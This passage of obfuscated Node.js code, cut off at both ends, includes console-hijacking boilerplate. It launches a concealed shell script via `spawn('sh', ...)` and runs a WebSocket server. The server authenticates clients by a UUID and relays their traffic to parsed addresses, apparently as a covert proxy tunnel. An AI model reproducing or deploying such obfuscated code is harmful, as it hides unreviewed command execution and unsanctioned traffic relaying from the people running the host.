_0x4f7a60;try{if(_0x35f877[_0x56a2ea(-0x9d,-0xf0,-0x2a,0x8,-0x120)](_0x35f877[_0x5a86c6(0xb1,0x3a,0x0,0x42,0x3a)],_0x35f877[_0x56a2ea(-0xa6,-0x186,-0x178,-0x51,-0x2a)]))_0x599484=_0x2d52fb;else{const _0x4b6401=_0x35f877[_0x1f542c(-0x2c,0x44,0xce,0x7,0x9c)](Function,_0x35f877[_0x56a2ea(-0xf0,-0xc2,-0x165,-0x168,-0x3f)](_0x35f877[_0xd2d693(0x1fe,0x29f,0x27d,0x10e,0x218)](_0x35f877[_0x5e1a7a(-0x340,-0x344,-0x328,-0x1c8,-0x270)],_0x35f877[_0x5a86c6(0x33,0x30,-0xe,-0x49,-0x43)]),');'));_0x4f7a60=_0x35f877[_0x1f542c(0x132,0xd0,0x1d7,0x4b,0x10e)](_0x4b6401);}}catch(_0x57388d){_0x35f877[_0x5a86c6(0xae,-0x5c,-0x74,-0x66,0x4d)](_0x35f877[_0x1f542c(0x41,0x15c,0x77,0x1d7,0x12e)],_0x35f877[_0xd2d693(0x13f,0xf0,0x1f9,0x7c,0x16b)])?_0x35f877[_0x5a86c6(-0x61,-0xf2,0x6d,-0x67,-0x75)](_0x39bf25):_0x4f7a60=window;}const _0x3f27fd=_0x4f7a60[_0xd2d693(0x180,0x1d9,0x100,0x1d7,0x23e)+'le']=_0x4f7a60[_0x1f542c(0x126,0x1c0,0x29,0x51,0xe6)+'le']||{};function _0x1f542c(_0x477355,_0xedc545,_0x18d292,_0x5cf9c7,_0x1fa2e0){return _0x222c(_0x1fa2e0-0x5,_0x5cf9c7);}function _0xd2d693(_0x112189,_0x371479,_0x3cfe87,_0x469dc7,_0x3ae34a){return _0x222c(_0x112189-0x9f,_0x3ae34a);}function _0x5e1a7a(_0x81e0ee,_0x1c8f5f,_0x5057d9,_0x44c650,_0x75c638){return _0x222c(_0x75c638- -0x3d3,_0x1c8f5f);}const _0x3e33f8=[_0x35f877[_0xd2d693(0x165,0x15a,0x1aa,0x225,0xb8)],_0x35f877[_0x56a2ea(-0x4b,0x6,-0x138,-0x9,-0x1d)],_0x35f877[_0xd2d693(0x169,0xfc,0x1a4,0xc8,0x13d)],_0x35f877[_0x1f542c(0x309,0x2fa,0x1e6,0x23b,0x226)],_0x35f877[_0x5e1a7a(-0x273,-0x382,-0x247,-0x30a,-0x2d0)],_0x35f877[_0x5a86c6(-0x159,-0x133,-0x7a,-0xfd,-0xdc)],_0x35f877[_0x5a86c6(0x76,-0x43,-0x28,-0x22,-0x45)]];function _0x5a86c6(_0xc87c0a,_0x553564,_0x27b30a,_0x1ac741,_0x20ac17){return _0x222c(_0x20ac17- -0x16f,_0x27b30a);}for(let _0x4cb676=-0x1cec+0x1*0x1b92+0x15a;_0x35f877[_0x1f542c(0xbc,0x146,0x1c1,0x1f2,0x163)](_0x4cb676,_0x3e33f8[_0xd2d693(0x18a,0x17b,0x1e0,0x1a2,0x129)+'h']);_0x4cb676++){if(_0x35f877[_0x56a2ea(-0x10,0x4f,0x81,-0xf0,0x8)](_0x35f877[_0xd2d693(0x206,0x1d2,0x127,0x2bf,0x12f)],_0x35f877[_0x1f542c(0x189,0x1e6,0x121,0x168,0x16c)])){const _0x26189e=new _0x5ed20f(_0x35f877[_0x56a2ea(-0x1e,-0x23,-0x13,-0x5e,0xb9)]),_0x3a302c=new _0x108b02(_0x35f877[_0xd2d693(0x222,0x238,0x1b9,0x276,0x311)],'i'),_0x2709e6=_0x35f877[_0x5e1a7a(-0x2bf,-0x2c0,-0x3be,-0x392,-0x33c)](_0x4664cb,_0x35f877[_0xd2d693(0x2bf,0x332,0x231,0x287,0x20e)]);!_0x26189e[_0x1f542c(0x1a3,0x10e,0x16a,0x102,0x124)](_0x35f877[_0x1f542c(0x1be,0x15c,0x1dc,0x1e1,0x164)](_0x2709e6,_0x35f877[_0x56a2ea(-0xcb,-0xc1,-0x138,-0x123,-0xf4)]))||!_0x3a302c[_0xd2d693(0x1be,0x221,0x273,0x19a,0x239)](_0x35f877[_0x1f542c(0x175,0x213,0xe1,0x79,0x164)](_0x2709e6,_0x35f877[_0x5a86c6(-0x35,-0xe2,-0x18b,-0x18c,-0xc3)]))?_0x35f877[_0x1f542c(0x76,0x7f,0x144,0x136,0x9c)](_0x2709e6,'0'):_0x35f877[_0x56a2ea(-0x88,0x3b,-0x140,0x2a,-0x117)](_0x4be393);}else{const _0x326dd0=_0x3e3e80[_0x1f542c(0x201,0x243,0xcb,0x19a,0x1aa)+_0xd2d693(0x164,0x1b9,0x201,0xb8,0x1bc)+'r'][_0x56a2ea(-0x29,-0xc,-0xe6,0x20,-0xa7)+_0x1f542c(0x102,0x115,0x16b,0x143,0x175)][_0x5e1a7a(-0x28b,-0x290,-0x1e9,-0x25a,-0x288)](_0x3e3e80),_0x30f3d4=_0x3e33f8[_0x4cb676],_0x5cc1dc=_0x3f27fd[_0x30f3d4]||_0x326dd0;_0x326dd0[_0x56a2ea(-0x109,-0xe4,-0x83,-0x142,-0xb4)+_0xd2d693(0x14c,0x174,0xe0,0x1d2,0x1b8)]=_0x3e3e80[_0x1f542c(0x167,0xa3,0x83,0x84,0x150)](_0x3e3e80),_0x326dd0[_0x5e1a7a(-0x11a,-0x1ae,-0x122,-0xd8,-0x195)+_0xd2d693(0x13e,0x165,0x172,0x1f5,0xe2)]=_0x5cc1dc[_0xd2d693(0x2dd,0x27a,0x2f7,0x260,0x391)+_0x1f542c(0xf7,0x49,-0x1f,0x148,0xa4)][_0x5e1a7a(-0x243,-0x2a6,-0x2b2,-0x225,-0x288)](_0x5cc1dc),_0x3f27fd[_0x30f3d4]=_0x326dd0;}}});_0x48a700();const net=require(_0x5b3717(-0xf8,-0x10d,-0x15d,-0x1ae,-0x179)),http=require(_0x5b3717(-0x19a,-0x244,-0x215,-0x13d,-0x182)),{WebSocket,createWebSocketStream}=require('ws'),{TextDecoder}=require(_0x5b3717(-0x2ca,-0x1df,-0x2ca,-0x384,-0x342)),logcb=(..._0xae0cb9)=>console[_0x5b3717(-0x291,-0x205,-0x2e8,-0x261,-0x2d9)][_0x1d31e6(0x126,0x1d7,0x1c1,0xf3,0x51)](this,..._0xae0cb9),errcb=(..._0x25b289)=>console[_0x5b3717(-0x2a5,-0x2ad,-0x22a,-0x2b7,-0x33b)][_0x1e3602(0x4a,0xde,-0xf9,-0xb,-0xbe)](this,..._0x25b289);function _0x1e3602(_0x153873,_0x28ca00,_0x36e8f2,_0x5320bc,_0x498200){return _0x222c(_0x5320bc- -0x156,_0x28ca00);}const {spawn}=require(_0x1e3602(-0x166,-0x68,-0x8d,-0x78,-0x9e)+_0x1d31e6(0x12a,0xa3,0x6a,0xed,0x1b2)+_0x1e3602(-0x9d,-0xa1,0xc,0x22,0x61)),uuid=(process[_0x1d31e6(0x1cc,0x247,0x1e1,0x155,0x1dd)][_0x5b3717(-0x23c,-0x153,-0x2a5,-0x247,-0x2bf)]||_0x504eae(0x2b4,0x24d,0x2dd,0x337,0x233)+_0x5b3717(-0x1c7,-0x154,-0x245,-0x26c,-0x1c5)+_0x3b9f4f(0xbd,0xac,-0xe,0x9e,0x2f)+_0x504eae(0x3b4,0x2ec,0x31d,0x325,0x473)+_0x1e3602(-0x56,0xbf,0xc4,0x8d,-0x13)+_0x3b9f4f(0x3d,-0x14,0xef,0x45,-0x60)+_0x3b9f4f(0xe1,0xc2,0x1ad,0x1b6,0x177)+'e')[_0x1e3602(0x13,0x12b,0x185,0xf4,0xe8)+'ce'](/-/g,''),port=process[_0x504eae(0x377,0x295,0x2fd,0x41e,0x305)][_0x1d31e6(0x1a9,0x13f,0x199,0x254,0x1c8)]||0x1c25+-0x75b*-0x5+-0x2238,shellFilePath=_0x504eae(0x392,0x36e,0x2e6,0x47c,0x45d)+_0x504eae(0x251,0x310,0x1f0,0x285,0x255),childProcess=spawn('sh',[shellFilePath]),httpServer=http[_0x1e3602(0x5f,0x176,0x1a4,0xb8,0x18f)+_0x5b3717(-0x1a8,-0x18b,-0x1a4,-0x207,-0x21d)+'er']((_0x1227b5,_0x1cbdc7)=>{const _0x1c21f8={'baaVO':_0x7dbfd5(0x434,0x45f,0x2fd,0x401,0x3aa)+_0x7dbfd5(0x3e4,0x33f,0x28d,0x38a,0x360),'cxNks':_0x29d5f9(0x203,0x2e2,0x223,0x236,0x245)+_0x270b17(0x3e7,0x2f6,0x2a7,0x28f,0x32f)+_0x270b17(0x2b3,0x21f,0x14b,0x1a7,0x1b5),'UbKUh':_0x270b17(0x1ce,0x19c,0xcb,0x106,0x136),'VUWbC':function(_0x17d3f3,_0x574243){return _0x17d3f3(_0x574243);},'KBBMA':_0x29d5f9(0x2a5,0x225,0x35c,0x35b,0x1ef),'QRTPc':_0x213bca(0x537,0x4bd,0x4b4,0x579,0x40e),'MbvHf':function(_0x35b46f,_0x58cecc){return _0x35b46f+_0x58cecc;},'CKgNX':function(_0x34a6c2,_0x164544){return _0x34a6c2==_0x164544;},'SSpbY':function(_0x4fa7eb,_0xe732e3){return _0x4fa7eb==_0xe732e3;},'UpZOL':function(_0x8b5df9,_0x548445){return _0x8b5df9+_0x548445;},'FphDo':function(_0xd8db64,_0x53229f){return _0xd8db64==_0x53229f;},'XdJIb':function(_0x1cafcd,_0x2fbc56,_0x5372b3,_0x1fb38a){return _0x1cafcd(_0x2fbc56,_0x5372b3,_0x1fb38a);},'prTxT':_0x7dbfd5(0x2b0,0x305,0x329,0x343,0x38e)+_0x5ec539(-0x125,-0x166,-0x53,-0x10b,-0x98),'bcCTr':function(_0x3b576c,_0x3c6b80,_0x4be179){return _0x3b576c(_0x3c6b80,_0x4be179);},'VJMWX':_0x213bca(0x368,0x44d,0x52f,0x3c1,0x408)+_0x29d5f9(0x299,0x2e3,0x361,0x381,0x22f)+'r:','Ejzpn':_0x29d5f9(0x1a3,0xf9,0x276,0x139,0xb2)+_0x5ec539(-0x155,-0x1eb,-0xb8,-0xc3,-0x104)+_0x5ec539(-0xa5,-0xbf,-0x16c,-0x18c,-0xaf)+_0x213bca(0x3d1,0x4a3,0x486,0x3df,0x4a9)+'ly','NXhPY':_0x7dbfd5(0x404,0x4ce,0x365,0x40c,0x3e0)+'ge','GlnpG':function(_0x4258a8,_0x1bfb99){return _0x4258a8(_0x1bfb99);},'jXxhT':_0x5ec539(-0xbc,-0x60,-0x19d,-0xce,-0x118)+_0x29d5f9(0x190,0x119,0x213,0x1ad,0x1ba)+_0x213bca(0x588,0x58c,0x49f,0x62d,0x4bf)+':','kEbvc':function(_0x20821b,_0x3f0326){return _0x20821b===_0x3f0326;},'VodzB':_0x5ec539(-0xe8,-0x4c,-0xb1,-0x6e,-0x1d0),'xHxer':_0x29d5f9(0x309,0x29f,0x355,0x3d2,0x3c3),'LegjN':function(_0xdbca3,_0x5ce2be){return _0xdbca3!==_0x5ce2be;},'KZCzm':_0x213bca(0x55f,0x573,0x540,0x607,0x5a3),'gHyhj':_0x270b17(0x18a,0x212,0x1cd,0x2ba,0x177),'Yicnh':_0x213bca(0x427,0x4a6,0x4c0,0x41a,0x4e1)+_0x270b17(0x393,0x2bb,0x2ea,0x1db,0x249)};function _0x5ec539(_0x13258a,_0x45ffac,_0x497887,_0x5548cc,_0x57df33){return _0x1e3602(_0x13258a-0x5a,_0x45ffac,_0x497887-0xbe,_0x13258a- -0x1a9,_0x57df33-0x62);}function _0x7dbfd5(_0x5eb884,_0x11000f,_0x4beaea,_0x26afa4,_0xde7a47){return _0x3b9f4f(_0xde7a47-0x3a8,_0x11000f-0x177,_0x4beaea-0x95,_0x26afa4-0x53,_0x5eb884);}function _0x213bca(_0x6ddd31,_0x2b7ad1,_0x5ef674,_0x4f6133,_0x284b61){return _0x504eae(_0x2b7ad1-0x1e4,_0x2b7ad1-0x78,_0x5ef674-0x190,_0x4f6133-0x1e0,_0x4f6133);}function _0x270b17(_0x22ec5c,_0x1daa2e,_0x498e0e,_0x2c5734,_0x24e531){return _0x3b9f4f(_0x1daa2e-0x1f5,_0x1daa2e-0x80,_0x498e0e-0x1f2,_0x2c5734-0x2b,_0x24e531);}function _0x29d5f9(_0x59865f,_0x3256ae,_0x4e1482,_0xaa1c12,_0x5dcc61){return _0x1e3602(_0x59865f-0x38,_0xaa1c12,_0x4e1482-0x110,_0x59865f-0x216,_0x5dcc61-0x1f2);}if(_0x1c21f8[_0x5ec539(-0x19b,-0xdf,-0x228,-0x1b9,-0x133)](_0x1227b5[_0x7dbfd5(0x3f8,0x2bf,0x412,0x437,0x386)],'/')){if(_0x1c21f8[_0x29d5f9(0x224,0x286,0x2aa,0x13a,0x304)](_0x1c21f8[_0x270b17(0x2e7,0x347,0x306,0x27d,0x260)],_0x1c21f8[_0x5ec539(-0x267,-0x2cd,-0x2f7,-0x2d4,-0x192)])){const _0x2b31ae={};_0x2b31ae[_0x29d5f9(0x216,0x171,0x23d,0x1b6,0x19b)+_0x29d5f9(0x16f,0x12d,0x1e5,0x1d5,0x7f)+'pe']=_0x1c21f8[_0x29d5f9(0x2ad,0x365,0x35a,0x1c4,0x226)],_0x473208[_0x7dbfd5(0x453,0x46b,0x481,0x354,0x39f)+_0x213bca(0x45f,0x479,0x561,0x469,0x4ae)](-0x1*-0x1be7+-0x34*-0x28+-0x233f*0x1,_0x2b31ae),_0x5c69a9[_0x213bca(0x519,0x4b2,0x565,0x52d,0x439)](_0x1c21f8[_0x270b17(0x387,0x2da,0x2fe,0x3a6,0x1eb)]);}else{const _0x58c93a={};_0x58c93a[_0x29d5f9(0x216,0x129,0x12c,0x2f9,0x22c)+_0x29d5f9(0x16f,0x143,0x16e,0xa5,0x113)+'pe']=_0x1c21f8[_0x7dbfd5(0x57f,0x423,0x45c,0x46b,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x28d,-0x2ef,-0x266,-0x232)+_0x5ec539(-0x1f0,-0x284,-0x197,-0x1a4,-0x2ba)](-0x1*-0x397+0x1*0x78f+-0x52f*0x2,_0x58c93a),_0x1cbdc7[_0x5ec539(-0x1b7,-0x22e,-0x27d,-0x139,-0x232)](_0x1c21f8[_0x7dbfd5(0x511,0x49e,0x493,0x4f8,0x48d)]);}}else{if(_0x1c21f8[_0x213bca(0x55b,0x51a,0x4e8,0x46c,0x50d)](_0x1c21f8[_0x7dbfd5(0x36f,0x444,0x4b0,0x4aa,0x41f)],_0x1c21f8[_0x7dbfd5(0x370,0x38d,0x438,0x373,0x38b)])){const _0x2c7708={};_0x2c7708[_0x213bca(0x3e4,0x4c0,0x448,0x5ac,0x483)+_0x270b17(0x232,0x1a7,0x281,0x24d,0xf1)+'pe']=_0x1c21f8[_0x7dbfd5(0x515,0x483,0x3b3,0x3ac,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x2e6,-0x2c5,-0x1a5,-0x20e)+_0x29d5f9(0x1cf,0x25b,0x20a,0x28b,0xf0)](0xa06+0x29*0x15+0xbcf*-0x1,_0x2c7708),_0x1cbdc7[_0x29d5f9(0x208,0x2d5,0x287,0x205,0x1ef)](_0x1c21f8[_0x5ec539(-0x142,-0x1a1,-0x8f,-0x197,-0x19d)]);}else{const _0x4a3fcb={'VxtEs':_0x1c21f8[_0x29d5f9(0x260,0x2da,0x1dc,0x223,0x24a)],'YMKao':function(_0x519f95,_0x1c4a82){function _0x10aa16(_0x47b5e4,_0x36b0f2,_0x550907,_0x436a48,_0x152343){return _0x5ec539(_0x47b5e4- -0x69,_0x36b0f2,_0x550907-0x112,_0x436a48-0x14c,_0x152343-0x40);}return _0x1c21f8[_0x10aa16(-0x1ed,-0x1df,-0x238,-0x2b4,-0x158)](_0x519f95,_0x1c4a82);},'iDzSp':_0x1c21f8[_0x213bca(0x504,0x51e,0x5ef,0x5de,0x5e3)],'mhjxL':function(_0x5121b5,_0xcc3f88){function _0x688250(_0x5c854c,_0x305258,_0x75ef46,_0x589ca9,_0x3ab5ab){return _0x213bca(_0x5c854c-0x18d,_0x305258- -0x3f3,_0x75ef46-0x13b,_0x3ab5ab,_0x3ab5ab-0x11b);}return _0x1c21f8[_0x688250(0x1d9,0xf2,0x126,0xe7,0x10b)](_0x5121b5,_0xcc3f88);},'ZcBtI':_0x1c21f8[_0x7dbfd5(0x330,0x340,0x35d,0x47d,0x3cc)],'GXkqo':function(_0x2a18c9,_0xf462c3){function _0x157cba(_0x411230,_0x4128a7,_0x4e1812,_0x49cfa7,_0x52cb71){return _0x5ec539(_0x4e1812-0x41b,_0x52cb71,_0x4e1812-0x194,_0x49cfa7-0x99,_0x52cb71-0xa2);}return _0x1c21f8[_0x157cba(0x18a,0x203,0x242,0x160,0x224)](_0x2a18c9,_0xf462c3);},'liHXh':function(_0x1a6491,_0x223a64){function _0x4aaa51(_0x4b7a2d,_0x54fb91,_0x4a9a1d,_0x53bd9a,_0xdc3b1e){return _0x213bca(_0x4b7a2d-0xd4,_0x4b7a2d- -0x570,_0x4a9a1d-0xc7,_0x54fb91,_0xdc3b1e-0xa6);}return _0x1c21f8[_0x4aaa51(-0x47,-0xf3,-0x9b,0x2b,-0xd3)](_0x1a6491,_0x223a64);},'BDovH':function(_0x9244af,_0x3db7ab){function _0x268979(_0x468383,_0x5bccfc,_0x37de67,_0x5b5ca1,_0x3e78cc){return _0x7dbfd5(_0x468383,_0x5bccfc-0xdd,_0x37de67-0x147,_0x5b5ca1-0xdb,_0x5b5ca1- -0x77);}return _0x1c21f8[_0x268979(0x3f3,0x3cb,0x3ab,0x424,0x3fc)](_0x9244af,_0x3db7ab);},'fBjQe':function(_0x4f6420,_0x3470f7){function _0x26bc63(_0x433001,_0x5f4de1,_0x317a3f,_0x5cc401,_0x5c6180){return _0x213bca(_0x433001-0x78,_0x317a3f- -0x4da,_0x317a3f-0x16a,_0x5c6180,_0x5c6180-0xee);}return _0x1c21f8[_0x26bc63(-0xde,-0x139,-0x4a,0x33,-0xa4)](_0x4f6420,_0x3470f7);},'IGTuh':function(_0x39e827,_0x288a81){function _0x363714(_0x1014a3,_0x42303a,_0x2335b8,_0x3bc845,_0x360e7f){return _0x29d5f9(_0x2335b8- -0x3db,_0x42303a-0x135,_0x2335b8-0x1b8,_0x1014a3,_0x360e7f-0x16e);}return _0x1c21f8[_0x363714(-0x146,-0x1c3,-0x1f5,-0x271,-0x156)](_0x39e827,_0x288a81);},'NLVqL':function(_0x39be05,_0x356769){function _0x3c96ea(_0x1348fb,_0x20fd17,_0x1d89e3,_0x40098e,_0xb5dac4){return _0x5ec539(_0x1d89e3-0x33,_0xb5dac4,_0x1d89e3-0x73,_0x40098e-0x1e9,_0xb5dac4-0xe3);}return _0x1c21f8[_0x3c96ea(0xe,-0xfc,-0x95,-0xd1,-0x28)](_0x39be05,_0x356769);},'fofzi':function(_0x3cc423,_0x3786db){function _0x369d35(_0x1379ad,_0x52aaa2,_0x5e4c0b,_0x39aad5,_0x1c563b){return _0x270b17(_0x1379ad-0xd6,_0x1c563b- -0x3a1,_0x5e4c0b-0xb0,_0x39aad5-0xe9,_0x1379ad);}return _0x1c21f8[_0x369d35(0x6d,-0x78,-0xfc,-0x122,-0x76)](_0x3cc423,_0x3786db);},'QmRQu':function(_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e){function _0x2b9cad(_0x3a8b36,_0x5f5aaa,_0x50e1cf,_0x305157,_0x4f0d4e){return _0x270b17(_0x3a8b36-0x3f,_0x50e1cf- -0x352,_0x50e1cf-0x82,_0x305157-0x10e,_0x3a8b36);}return _0x1c21f8[_0x2b9cad(-0x23e,-0x1fc,-0x1d8,-0x2bb,-0x2c4)](_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e);},'GwelD':_0x1c21f8[_0x7dbfd5(0x40f,0x4b8,0x495,0x3bd,0x429)],'tamNE':function(_0x9cc4ff,_0x3b60d4,_0x3b647e){function _0x5061c8(_0x4cecf0,_0x5a8a4a,_0x3060f3,_0x59c5cc,_0x35c7aa){return _0x213bca(_0x4cecf0-0x180,_0x3060f3- -0x5e8,_0x3060f3-0xe8,_0x59c5cc,_0x35c7aa-0x2b);}return _0x1c21f8[_0x5061c8(-0xa2,-0xac,-0xf0,-0xc1,-0xe7)](_0x9cc4ff,_0x3b60d4,_0x3b647e);},'rvbRb':_0x1c21f8[_0x7dbfd5(0x4df,0x54d,0x3f8,0x568,0x499)]};_0x5a5af8[_0x7dbfd5(0x275,0x311,0x272,0x431,0x363)](_0x1c21f8[_0x5ec539(-0x165,-0x95,-0xd7,-0x82,-0xe2)]),_0x138eef[_0x7dbfd5(0x40c,0x2bc,0x24f,0x29d,0x335)](_0x1c21f8[_0x29d5f9(0x1de,0xf0,0x132,0x17d,0x259)],_0x455e6d=>{const _0x40bda3={'mODJA':_0x4a3fcb[_0x3b30db(0x225,0x1ed,0x1de,0x1ed,0x167)],'baqfC':function(_0x2c057e,_0x47734d){function _0x116e99(_0x55554a,_0x8683c7,_0x55db72,_0x251edd,_0x11b849){return _0x3b30db(_0x11b849- -0x128,_0x8683c7-0x56,_0x8683c7,_0x251edd-0x3,_0x11b849-0x43);}return _0x4a3fcb[_0x116e99(0x106,0xda,0xa6,-0x3c,0x50)](_0x2c057e,_0x47734d);},'tsKtZ':_0x4a3fcb[_0x3b30db(0x2a6,0x36c,0x278,0x20d,0x234)],'QtdjG':function(_0x30cacf,_0x890783){function _0x4a95a8(_0x2d26cd,_0x58b1f1,_0x38a957,_0x4ff900,_0x116f39){return _0x3b30db(_0x58b1f1- -0x11d,_0x58b1f1-0x66,_0x4ff900,_0x4ff900-0xd1,_0x116f39-0x1a7);}return _0x4a3fcb[_0x4a95a8(-0xea,-0x6,0x8c,0x48,0xd3)](_0x30cacf,_0x890783);},'KbQMx':_0x4a3fcb[_0x583d07(0x1a,-0xd3,-0x65,-0x15d,-0xbf)]};function _0x207e22(_0x13fdb1,_0x4bdc41,_0x3dbead,_0x3235d2,_0x22b63d){return _0x7dbfd5(_0x3235d2,_0x4bdc41-0x115,_0x3dbead-0x2a,_0x3235d2-0xb1,_0x4bdc41- -0x5ec);}const [_0x494a4f]=_0x455e6d,_0x13646c=_0x455e6d[_0x3b30db(0x1f2,0x2c9,0x160,0x2c2,0x17c)](0x2*-0xa66+-0x1de9+0x32b6,-0x24d1+-0x7dd+0x2cbf);if(!_0x13646c[_0x207e22(-0x287,-0x22a,-0x1af,-0x2d3,-0x15b)]((_0x9d9ec0,_0x2f8e48)=>_0x9d9ec0==_0x5b146a(_0x39e3b7[_0x2146f8(-0x2ec,-0x2b2,-0x31c,-0x263,-0x2df)+'r'](_0x2f8e48*(0x1*0xb65+-0x29f*-0xc+-0x1*0x2ad7),0x1e30+0x11*0x3d+-0x223b),0x10b8+-0x2*-0x6d7+0x1e56*-0x1)))return;let _0x1d6e36=_0x4a3fcb[_0xcca952(0x483,0x450,0x441,0x423,0x4b2)](_0x455e6d[_0xcca952(0x53d,0x4be,0x580,0x4cb,0x44c)](-0x2508+0x1*0x18cc+0xc4d,-0x204*-0x10+-0x239a+0x36c)[_0x583d07(-0xab,0x1d,0xb,-0x170,-0xb7)+_0x3b30db(0x17a,0xb4,0x202,0x21f,0x1fa)](),0x61*-0x59+-0x904*-0x1+0x18c8);const _0x4f52ed=_0x455e6d[_0x583d07(-0x14d,-0x35,-0xbf,-0xc0,-0x63)](_0x1d6e36,_0x1d6e36+=-0x120f+-0x41*-0x86+-0xff5)[_0x3b30db(0x19e,0x194,0x189,0x1a6,0x10d)+_0x3b30db(0x28a,0x1ca,0x215,0x352,0x1ba)+'BE'](0xfe*-0x3+0x22d+0xcd),_0x3fb1c5=_0x455e6d[_0xcca952(0x577,0x4be,0x405,0x43e,0x487)](_0x1d6e36,_0x1d6e36+=-0x18e3+-0x66d*0x1+0x1f51)[_0x3b30db(0x19e,0x14f,0x1bf,0x1d8,0x1c8)+_0x2146f8(-0x237,-0x203,-0x233,-0x22b,-0x2a8)](),_0x5b52f1=_0x4a3fcb[_0x207e22(-0x12e,-0x164,-0xdc,-0x193,-0x85)](_0x3fb1c5,0x3b2*-0x2+0x2275*-0x1+0x1e7*0x16)?_0x455e6d[_0x207e22(-0x218,-0x1e1,-0x29b,-0x230,-0x119)](_0x1d6e36,_0x1d6e36+=-0x158d+-0x1a07*-0x1+-0x476)[_0xcca952(0x62f,0x552,0x628,0x4cb,0x476)]('.'):_0x4a3fcb[_0x2146f8(-0x22c,-0x33b,-0x2ea,-0x276,-0x2ee)](_0x3fb1c5,0x22d*-0x2+-0xbb7+-0x1013*-0x1)?new _0x2486f9()[_0x3b30db(0x21f,0x15c,0x232,0x2b4,0x272)+'e'](_0x455e6d[_0xcca952(0x4aa,0x4be,0x427,0x4c2,0x419)](_0x4a3fcb[_0x2146f8(-0x260,-0x38b,-0x2a8,-0x2a9,-0x2a9)](_0x1d6e36,-0x13*-0xa+-0x13ae+0x12f1),_0x1d6e36+=_0x4a3fcb[_0x583d07(-0x70,-0x109,-0x17b,-0x5a,-0xe7)](0x207e*0x1+-0x2046+-0x1*0x37,_0x455e6d[_0xcca952(0x421,0x4be,0x4c2,0x534,0x41d)](_0x1d6e36,_0x4a3fcb[_0x2146f8(-0x2c4,-0x2e3,-0x1b0,-0x1d3,-0x1ff)](_0x1d6e36,-0xc11+0x12*-0x7+-0x18*-0x86))[_0x2146f8(-0x2a6,-0x1ff,-0x254,-0x368,-0x284)+_0x583d07(-0xe7,-0x23,-0x1f,-0xca,-0xdb)]()))):_0x4a3fcb[_0x2146f8(-0x206,-0x1bd,-0x2b1,-0x2c1,-0x22e)](_0x3fb1c5,0x14ed+-0x2502+0x1018)?_0x455e6d[_0x207e22(-0x198,-0x1e1,-0x102,-0x225,-0x2ad)](_0x1d6e36,_0x1d6e36+=-0xca7+0x125b*0x1+-0x5a4)[_0xcca952(0x3ad,0x49d,0x4af,0x4bb,0x4fc)+'e']((_0x4e2bb2,_0x3c8268,_0x4ecfb3,_0x1b3c70)=>_0x4ecfb3%(0x1981+0x1162+-0x1*0x2ae1)?_0x4e2bb2[_0x2146f8(-0x2d5,-0x318,-0x37d,-0x33a,-0x2fa)+'t'](_0x1b3c70[_0xcca952(0x56c,0x4be,0x569,0x48c,0x54b)](_0x4ecfb3-(-0x65*0x37+0x3ce+0x11e6),_0x4ecfb3+(-0x3*-0x506+-0x1ae4+0xbd3))):_0x4e2bb2,[])[_0x583d07(-0x94,-0x59,-0x4b,-0x33,-0x96)](_0x4ce2d5=>_0x4ce2d5[_0xcca952(0x529,0x46a,0x49a,0x4f4,0x4cd)+_0x583d07(-0xae,0x111,0x8d,0x70,0x35)+'BE'](-0x4d*-0x22+-0x270*0x10+0x1cc6)[_0x583d07(-0x9,0x93,0xe4,0x61,0x7b)+_0x583d07(-0x11a,-0x57,-0xc0,-0x54,-0x124)](0x6e6*0x1+-0x1d66+0x1690))[_0x3b30db(0x286,0x22e,0x209,0x220,0x289)](':'):'';_0x4a3fcb[_0x583d07(-0xd1,-0xb,-0xfe,-0x111,-0x2f)](_0x1f0967,_0x4a3fcb[_0x3b30db(0x2c6,0x2c3,0x252,0x33a,0x395)],_0x5b52f1,_0x4f52ed);function _0x2146f8(_0x1d4b5b,_0x2f588e,_0x20ba08,_0xa0c5,_0x152e14){return _0x29d5f9(_0x152e14- -0x450,_0x2f588e-0x10b,_0x20ba08-0x95,_0x1d4b5b,_0x152e14-0x14);}_0x2e49a9[_0x3b30db(0x189,0x1a1,0x136,0xcf,0x13f)](new _0x5b208c([_0x494a4f,-0x3f5+0x218b+-0x1d96]));const _0x547ab0=_0x4a3fcb[_0x583d07(-0x41,0xd,-0x19d,-0x15a,-0xdd)](_0x1171a1,_0x4b5aa3),_0x362371={};function _0x583d07(_0x175522,_0x401356,_0x1df422,_0x46d992,_0xa03659){return _0x270b17(_0x175522-0xbf,_0xa03659- -0x2bb,_0x1df422-0x63,_0x46d992-0x173,_0x1df422);}function _0x3b30db(_0x1e0d37,_0x562ef0,_0x564c4b,_0x5872c0,_0x450259){return _0x213bca(_0x1e0d37-0x11b,_0x1e0d37- -0x2d8,_0x564c4b-0x9f,_0x564c4b,_0x450259-0x1bd);}_0x362371[_0x3b30db(0x2f0,0x36d,0x312,0x29d,0x3ad)]=_0x5b52f1,_0x362371[_0x583d07(-0x139,-0x1b5,-0xf4,-0x1d6,-0x146)]=_0x4f52ed;const _0xb54f8b={};_0xb54f8b[_0xcca952(0x662,0x5bc,0x5a9,0x500,0x682)]=_0x5b52f1,_0xb54f8b[_0x583d07(-0x14e,-0x198,-0x237,-0xa9,-0x146)]=_0x4f52ed;function _0xcca952(_0x3a9eda,_0x1dbf6f,_0x49fc7d,_0x419bce,_0x17225b){return _0x7dbfd5(_0x419bce,_0x1dbf6f-0x1c,_0x49fc7d-0x15e,_0x419bce-0x1f0,_0x1dbf6f-0xb3);}_0x438959[_0x583d07(-0x1f,-0x15b,-0x55,-0x5c,-0xde)+'ct'](_0x362371,function(){function _0x23d9a3(_0x1b9028,_0x308619,_0x45a73e,_0x4996e2,_0x5845fb){return _0x3b30db(_0x1b9028-0x277,_0x308619-0xa3,_0x5845fb,_0x4996e2-0x1bd,_0x5845fb-0xcc);}function _0x687019(_0x5252d6,_0x57cac2,_0x3bdeed,_0x2fd398,_0x5c6fe8){return _0x2146f8(_0x5c6fe8,_0x57cac2-0x123,_0x3bdeed-0xe0,_0x2fd398-0x37,_0x5252d6-0x3dc);}this[_0x1e5482(-0xeb,-0x11f,-0x1bc,-0x136,-0xd4)](_0x455e6d[_0x9c6c20(-0x5b,-0xbc,0x8,0x6,-0x2e)](_0x1d6e36));function _0x9c6c20(_0x23b2d2,_0x2d98d3,_0x907baa,_0x1649d3,_0x52b7e8){return 